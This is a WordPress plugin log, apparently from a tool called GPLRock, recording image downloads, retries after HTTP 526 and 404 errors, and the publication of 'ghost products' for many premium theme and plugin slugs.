GPLRock: Using pre-downloaded image for product foturo-photography-portfolio-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-380264f5.webp [02-Apr-2026 09:49:57 UTC] GPLRock: Ghost product published with image - Product ID: foturo-photography-portfolio-creative-agency-elementor-template-kit [02-Apr-2026 09:49:59 UTC] GPLRock: Image downloaded successfully for product fotro-food-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7391d249.webp [02-Apr-2026 09:49:59 UTC] GPLRock: Using pre-downloaded image for product fotro-food-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7391d249.webp [02-Apr-2026 09:49:59 UTC] GPLRock: Ghost product published with image - Product ID: fotro-food-restaurant-elementor-template-kit [02-Apr-2026 09:50:01 UTC] GPLRock: Image downloaded successfully for product foruum-saas-software-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c36b4ac8.webp [02-Apr-2026 09:50:01 UTC] GPLRock: Using pre-downloaded image for product foruum-saas-software-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c36b4ac8.webp [02-Apr-2026 09:50:01 UTC] GPLRock: Ghost product published with image - Product ID: foruum-saas-software-startup-elementor-template-kit [02-Apr-2026 09:50:03 UTC] GPLRock: Image downloaded successfully for product foodzey-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6a2e15ba.jpg [02-Apr-2026 09:50:03 UTC] GPLRock: Using pre-downloaded image for product foodzey-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6a2e15ba.jpg [02-Apr-2026 09:50:03 UTC] GPLRock: Ghost product published with image - Product ID: foodzey-restaurant-elementor-template-kit [02-Apr-2026 10:42:43 UTC] GPLRock: Image download failed for product nutrition-facts-label-creator-gutenberg-block (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:42:45 UTC] GPLRock: Image download failed for product nutrition-facts-label-creator-gutenberg-block (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:42:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nutrition-facts-label-creator-gutenberg-block-9789.webp for product nutrition-facts-label-creator-gutenberg-block after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:42:47 UTC] GPLRock: Image download failed for product nutrition-facts-label-creator-gutenberg-block (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:42:49 UTC] GPLRock: Image download failed for product nutrition-facts-label-creator-gutenberg-block (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:42:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nutrition-facts-label-creator-gutenberg-block-9789.webp for product nutrition-facts-label-creator-gutenberg-block after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:42:51 UTC] GPLRock WARNING: Image download failed for product nutrition-facts-label-creator-gutenberg-block. URL: https://meldwp.com/wp-content/uploads/nutrition-facts-label-creator-gutenberg-block-9789.webp [02-Apr-2026 10:42:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nutrition-facts-label-creator-gutenberg-block [02-Apr-2026 10:42:51 UTC] GPLRock: Image download failed for product weight-based-shipping-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:42:53 UTC] GPLRock: Image download failed for product weight-based-shipping-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:42:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/weight-based-shipping-for-woocommerce-24373.webp for product weight-based-shipping-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:42:55 UTC] GPLRock: Image download failed for product weight-based-shipping-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:42:58 UTC] GPLRock: Image download failed for product weight-based-shipping-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/weight-based-shipping-for-woocommerce-24373.webp for product weight-based-shipping-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:00 UTC] GPLRock WARNING: Image download failed for product weight-based-shipping-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/weight-based-shipping-for-woocommerce-24373.webp [02-Apr-2026 10:43:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: weight-based-shipping-for-woocommerce [02-Apr-2026 10:43:00 UTC] GPLRock: Image download failed for product google-feed-manager-for-woocommerce-by-tatvic (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:02 UTC] GPLRock: Image download failed for product google-feed-manager-for-woocommerce-by-tatvic (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/google-feed-manager-for-woocommerce-by-tatvic-4988.webp for product google-feed-manager-for-woocommerce-by-tatvic after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:04 UTC] GPLRock: Image download failed for product google-feed-manager-for-woocommerce-by-tatvic (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:06 UTC] GPLRock: Image download failed for product google-feed-manager-for-woocommerce-by-tatvic (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/google-feed-manager-for-woocommerce-by-tatvic-4988.webp for product google-feed-manager-for-woocommerce-by-tatvic after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:08 UTC] GPLRock WARNING: Image download failed for product google-feed-manager-for-woocommerce-by-tatvic. URL: https://meldwp.com/wp-content/uploads/google-feed-manager-for-woocommerce-by-tatvic-4988.webp [02-Apr-2026 10:43:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: google-feed-manager-for-woocommerce-by-tatvic [02-Apr-2026 10:43:09 UTC] GPLRock: Image download failed for product junk-data-cleaner-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:11 UTC] GPLRock: Image download failed for product junk-data-cleaner-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/junk-data-cleaner-for-wordpress-19043.webp for product junk-data-cleaner-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:13 UTC] GPLRock: Image download failed for product junk-data-cleaner-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:15 UTC] GPLRock: Image download failed for product junk-data-cleaner-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/junk-data-cleaner-for-wordpress-19043.webp for product junk-data-cleaner-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:17 UTC] GPLRock WARNING: Image download failed for product junk-data-cleaner-for-wordpress. URL: https://meldwp.com/wp-content/uploads/junk-data-cleaner-for-wordpress-19043.webp [02-Apr-2026 10:43:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: junk-data-cleaner-for-wordpress [02-Apr-2026 10:43:17 UTC] GPLRock: Image download failed for product wiloke-icon-box-envy-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:19 UTC] GPLRock: Image download failed for product wiloke-icon-box-envy-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-icon-box-envy-for-elementor-8988.webp for product wiloke-icon-box-envy-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:22 UTC] GPLRock: Image download failed for product wiloke-icon-box-envy-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:24 UTC] GPLRock: Image download failed for product wiloke-icon-box-envy-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-icon-box-envy-for-elementor-8988.webp for product wiloke-icon-box-envy-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:26 UTC] GPLRock WARNING: Image download failed for product wiloke-icon-box-envy-for-elementor. URL: https://meldwp.com/wp-content/uploads/wiloke-icon-box-envy-for-elementor-8988.webp [02-Apr-2026 10:43:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wiloke-icon-box-envy-for-elementor [02-Apr-2026 10:43:26 UTC] GPLRock: Image download failed for product mega-posts-and-custom-posts-display-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:28 UTC] GPLRock: Image download failed for product mega-posts-and-custom-posts-display-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mega-posts-and-custom-posts-display-wp-plugin-15140.webp for product mega-posts-and-custom-posts-display-wp-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:31 UTC] GPLRock: Image download failed for product mega-posts-and-custom-posts-display-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:33 UTC] GPLRock: Image download failed for product mega-posts-and-custom-posts-display-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mega-posts-and-custom-posts-display-wp-plugin-15140.webp for product mega-posts-and-custom-posts-display-wp-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:35 UTC] GPLRock WARNING: Image download failed for product mega-posts-and-custom-posts-display-wp-plugin. URL: https://meldwp.com/wp-content/uploads/mega-posts-and-custom-posts-display-wp-plugin-15140.webp [02-Apr-2026 10:43:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mega-posts-and-custom-posts-display-wp-plugin [02-Apr-2026 10:43:35 UTC] GPLRock: Image downloaded successfully for product easy-woocommerce-per-product-shipping (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3ac9499.webp [02-Apr-2026 10:43:35 UTC] GPLRock: Using pre-downloaded image for product easy-woocommerce-per-product-shipping: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3ac9499.webp [02-Apr-2026 10:43:35 UTC] GPLRock: Ghost product published with image - Product ID: easy-woocommerce-per-product-shipping [02-Apr-2026 10:43:35 UTC] GPLRock: Image download failed for product swiper-slider-widget-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:37 UTC] GPLRock: Image download failed for product swiper-slider-widget-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/swiper-slider-widget-for-elementor-22791.webp for product swiper-slider-widget-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:39 UTC] GPLRock: Image download failed for product swiper-slider-widget-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:42 UTC] GPLRock: Image download failed for product swiper-slider-widget-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/swiper-slider-widget-for-elementor-22791.webp for product swiper-slider-widget-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:44 UTC] GPLRock WARNING: Image download failed for product swiper-slider-widget-for-elementor. URL: https://meldwp.com/wp-content/uploads/swiper-slider-widget-for-elementor-22791.webp [02-Apr-2026 10:43:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: swiper-slider-widget-for-elementor [02-Apr-2026 10:43:44 UTC] GPLRock: Image downloaded successfully for product stockupp-split-order-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-55c61ba6.webp [02-Apr-2026 10:43:44 UTC] GPLRock: Using pre-downloaded image for product stockupp-split-order-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-55c61ba6.webp [02-Apr-2026 10:43:44 UTC] GPLRock: Ghost product published with image - Product ID: stockupp-split-order-for-woocommerce [02-Apr-2026 10:43:44 UTC] GPLRock: Image download failed for product user-signup-for-arforms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:46 UTC] GPLRock: Image download failed for product user-signup-for-arforms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/user-signup-for-arforms-13702.webp for product user-signup-for-arforms after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:48 UTC] GPLRock: Image download failed for product user-signup-for-arforms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:50 UTC] GPLRock: Image download failed for product user-signup-for-arforms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 10:43:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/user-signup-for-arforms-13702.webp for product user-signup-for-arforms after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 10:43:52 UTC] GPLRock WARNING: Image download failed for product user-signup-for-arforms. URL: https://meldwp.com/wp-content/uploads/user-signup-for-arforms-13702.webp [02-Apr-2026 10:43:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: user-signup-for-arforms [02-Apr-2026 10:51:14 UTC] GPLRock: Image download failed for product woffice-intranet-extranet-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:51:14 UTC] GPLRock: Image downloaded successfully for product med-pets-veterinarian-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ce35d9e.bmp [02-Apr-2026 10:51:15 UTC] GPLRock: Using pre-downloaded image for product med-pets-veterinarian-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ce35d9e.bmp [02-Apr-2026 10:51:15 UTC] GPLRock: Ghost product published with image - Product ID: med-pets-veterinarian-elementor-template-kit [02-Apr-2026 10:51:16 UTC] GPLRock: Image downloaded successfully for product mecha-car-repair-auto-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1dc175ed.webp [02-Apr-2026 10:51:16 UTC] GPLRock: Using pre-downloaded image for product mecha-car-repair-auto-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1dc175ed.webp [02-Apr-2026 10:51:16 UTC] GPLRock: Ghost product published with image - Product ID: mecha-car-repair-auto-service-elementor-template-kit [02-Apr-2026 10:51:18 UTC] GPLRock: Image downloaded successfully for product meatezy-meat-shop-butcher-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ecf8fdc8.jpg [02-Apr-2026 10:51:18 UTC] GPLRock: Using pre-downloaded image for product meatezy-meat-shop-butcher-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ecf8fdc8.jpg [02-Apr-2026 10:51:18 UTC] GPLRock: Ghost product published with image - Product ID: meatezy-meat-shop-butcher-elementor-template-kit [02-Apr-2026 10:51:18 UTC] GPLRock: Image download failed for product woffice-intranet-extranet-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:51:19 UTC] GPLRock: Image downloaded successfully for product mazuma-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4aac438e.jpg [02-Apr-2026 10:51:19 UTC] GPLRock: Using pre-downloaded image for product mazuma-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4aac438e.jpg [02-Apr-2026 10:51:19 UTC] GPLRock: Ghost product published with image - Product ID: mazuma-business-elementor-template-kit [02-Apr-2026 10:51:21 UTC] GPLRock: Image downloaded successfully for product maxinet-internet-iptv-provider-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e8f4910.webp [02-Apr-2026 10:51:21 UTC] GPLRock: Using pre-downloaded image for product maxinet-internet-iptv-provider-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e8f4910.webp [02-Apr-2026 10:51:21 UTC] GPLRock: Ghost product published with image - Product ID: maxinet-internet-iptv-provider-elementor-template-kit [02-Apr-2026 10:51:22 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/11/Woffice-Intranet-Extranet-WordPress-Theme.jpg for product woffice-intranet-extranet-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [02-Apr-2026 10:51:22 UTC] GPLRock: Image downloaded successfully for product maven-business-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a290e849.webp [02-Apr-2026 10:51:22 UTC] GPLRock: Using pre-downloaded image for product maven-business-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a290e849.webp [02-Apr-2026 10:51:22 UTC] GPLRock: Ghost product published with image - Product ID: maven-business-agency-elementor-template-kit [02-Apr-2026 10:51:23 UTC] GPLRock: Image downloaded successfully for product master-esport-team-gaming-community-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d4d7c388.webp [02-Apr-2026 10:51:23 UTC] GPLRock: Using pre-downloaded image for product master-esport-team-gaming-community-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d4d7c388.webp [02-Apr-2026 10:51:23 UTC] GPLRock: Ghost product published with image - Product ID: master-esport-team-gaming-community-elementor-template-kit [02-Apr-2026 10:51:24 UTC] GPLRock: Image download failed for product woffice-intranet-extranet-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:51:25 UTC] GPLRock: Image downloaded successfully for product mashura-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b6b5f44.webp [02-Apr-2026 10:51:25 UTC] GPLRock: Using pre-downloaded image for product mashura-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b6b5f44.webp [02-Apr-2026 10:51:25 UTC] GPLRock: Ghost product published with image - Product ID: mashura-portfolio-elementor-template-kit [02-Apr-2026 10:51:26 UTC] GPLRock: Image downloaded successfully for product maser-web-design-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af644e99.webp [02-Apr-2026 10:51:26 UTC] GPLRock: Using pre-downloaded image for product maser-web-design-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af644e99.webp [02-Apr-2026 10:51:26 UTC] GPLRock: Ghost product published with image - Product ID: maser-web-design-agency-elementor-template-kit [02-Apr-2026 10:51:28 UTC] GPLRock: Image downloaded successfully for product mascoolin-fashion-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c45f4bf.webp [02-Apr-2026 10:51:28 UTC] GPLRock: Using pre-downloaded image for product mascoolin-fashion-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c45f4bf.webp [02-Apr-2026 10:51:28 UTC] GPLRock: Ghost product published with image - Product ID: mascoolin-fashion-store-elementor-template-kit [02-Apr-2026 10:51:28 UTC] GPLRock: Image download failed for product woffice-intranet-extranet-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:51:32 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/11/Woffice-Intranet-Extranet-WordPress-Theme.jpg for product woffice-intranet-extranet-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [02-Apr-2026 10:51:32 UTC] GPLRock WARNING: Image download failed for product woffice-intranet-extranet-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2020/11/Woffice-Intranet-Extranet-WordPress-Theme.jpg [02-Apr-2026 10:51:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woffice-intranet-extranet-wordpress-theme [02-Apr-2026 10:51:34 UTC] GPLRock: Image downloaded successfully for product asset-cleanup-page-speed-booster-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ddbb8ab.jpg [02-Apr-2026 10:51:34 UTC] GPLRock: Using pre-downloaded image for product asset-cleanup-page-speed-booster-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ddbb8ab.jpg [02-Apr-2026 10:51:34 UTC] GPLRock: Ghost product published with image - Product ID: asset-cleanup-page-speed-booster-pro [02-Apr-2026 10:51:35 UTC] GPLRock: Image downloaded successfully for product elite-video-player (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff036990.jpg [02-Apr-2026 10:51:35 UTC] GPLRock: Using pre-downloaded image for product elite-video-player: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff036990.jpg [02-Apr-2026 10:51:35 UTC] GPLRock: Ghost product published with image - Product ID: elite-video-player [02-Apr-2026 10:51:37 UTC] GPLRock: Image downloaded successfully for product gravity-perks-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84d25207.jpg [02-Apr-2026 10:51:37 UTC] GPLRock: Using pre-downloaded image for product gravity-perks-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84d25207.jpg [02-Apr-2026 10:51:37 UTC] GPLRock: Ghost product published with image - Product ID: gravity-perks-wordpress-plugin [02-Apr-2026 10:51:38 UTC] GPLRock: Image downloaded successfully for product woocs-woocommerce-currency-switcher (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d60de634.jpg [02-Apr-2026 10:51:38 UTC] GPLRock: Using pre-downloaded image for product woocs-woocommerce-currency-switcher: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d60de634.jpg [02-Apr-2026 10:51:38 UTC] GPLRock: Ghost product published with image - Product ID: woocs-woocommerce-currency-switcher [02-Apr-2026 10:51:40 UTC] GPLRock: Image downloaded successfully for product charity-foundation (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb94bfc5.jpeg [02-Apr-2026 10:51:40 UTC] GPLRock: Using pre-downloaded image for product charity-foundation: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb94bfc5.jpeg [02-Apr-2026 10:51:40 UTC] GPLRock: Ghost product published with image - Product ID: charity-foundation [02-Apr-2026 10:51:43 UTC] GPLRock: Image download failed for product gravity-view-wordpress-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:51:46 UTC] GPLRock: Image download failed for product gravity-view-wordpress-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:51:50 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/05/Gravity-View-WordPress-Plugin.jpg for product gravity-view-wordpress-plugin after 3 attempts. HTTP Code: 404, Error: [02-Apr-2026 10:51:52 UTC] GPLRock: Image download failed for product gravity-view-wordpress-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:51:55 UTC] GPLRock: Image download failed for product gravity-view-wordpress-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:51:59 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/05/Gravity-View-WordPress-Plugin.jpg for product gravity-view-wordpress-plugin after 3 attempts. HTTP Code: 404, Error: [02-Apr-2026 10:51:59 UTC] GPLRock WARNING: Image download failed for product gravity-view-wordpress-plugin. URL: https://www.gplrock.com/wp-content/uploads/2021/05/Gravity-View-WordPress-Plugin.jpg [02-Apr-2026 10:51:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gravity-view-wordpress-plugin [02-Apr-2026 10:52:01 UTC] GPLRock: Image download failed for product pretty-links-pro (attempt 1/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:52:05 UTC] GPLRock: Image download failed for product pretty-links-pro (attempt 2/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:52:09 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/06/Pretty-Links-Pro.jpg for product pretty-links-pro after 3 attempts. HTTP Code: 404, Error: [02-Apr-2026 10:52:11 UTC] GPLRock: Image download failed for product pretty-links-pro (attempt 1/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:52:14 UTC] GPLRock: Image download failed for product pretty-links-pro (attempt 2/3). HTTP Code: 404, Error: . Retrying... [02-Apr-2026 10:52:18 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/06/Pretty-Links-Pro.jpg for product pretty-links-pro after 3 attempts. HTTP Code: 404, Error: [02-Apr-2026 10:52:18 UTC] GPLRock WARNING: Image download failed for product pretty-links-pro. URL: https://www.gplrock.com/wp-content/uploads/2021/06/Pretty-Links-Pro.jpg [02-Apr-2026 10:52:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pretty-links-pro [02-Apr-2026 10:52:20 UTC] GPLRock: Image downloaded successfully for product blo-corporate-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4d64041a.avif [02-Apr-2026 10:52:20 UTC] GPLRock: Using pre-downloaded image for product blo-corporate-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4d64041a.avif [02-Apr-2026 10:52:20 UTC] GPLRock: Ghost product published with image - Product ID: blo-corporate-business-wordpress-theme [02-Apr-2026 10:52:21 UTC] GPLRock: Image downloaded successfully for product wpforms-form-templates-pack (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f5d2187b.jpg [02-Apr-2026 10:52:21 UTC] GPLRock: Using pre-downloaded image for product wpforms-form-templates-pack: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f5d2187b.jpg [02-Apr-2026 10:52:21 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-form-templates-pack [02-Apr-2026 10:52:29 UTC] GPLRock: Image downloaded successfully for product yith-product-shipping-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4549b91f.jpg [02-Apr-2026 10:52:29 UTC] GPLRock: Using pre-downloaded image for product yith-product-shipping-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4549b91f.jpg [02-Apr-2026 10:52:29 UTC] GPLRock: Ghost product published with image - Product ID: yith-product-shipping-for-woocommerce-premium [02-Apr-2026 10:52:30 UTC] GPLRock: Image downloaded successfully for product profile-builder-pro-wordpress-profile-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c13c19e.jpg [02-Apr-2026 10:52:30 UTC] GPLRock: Using pre-downloaded image for product profile-builder-pro-wordpress-profile-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c13c19e.jpg [02-Apr-2026 10:52:30 UTC] GPLRock: Ghost product published with image - Product ID: profile-builder-pro-wordpress-profile-plugin [02-Apr-2026 10:52:32 UTC] GPLRock: Image downloaded successfully for product woocommerce-local-pickup-plus (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ef929fab.jpg [02-Apr-2026 10:52:32 UTC] GPLRock: Using pre-downloaded image for product woocommerce-local-pickup-plus: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ef929fab.jpg 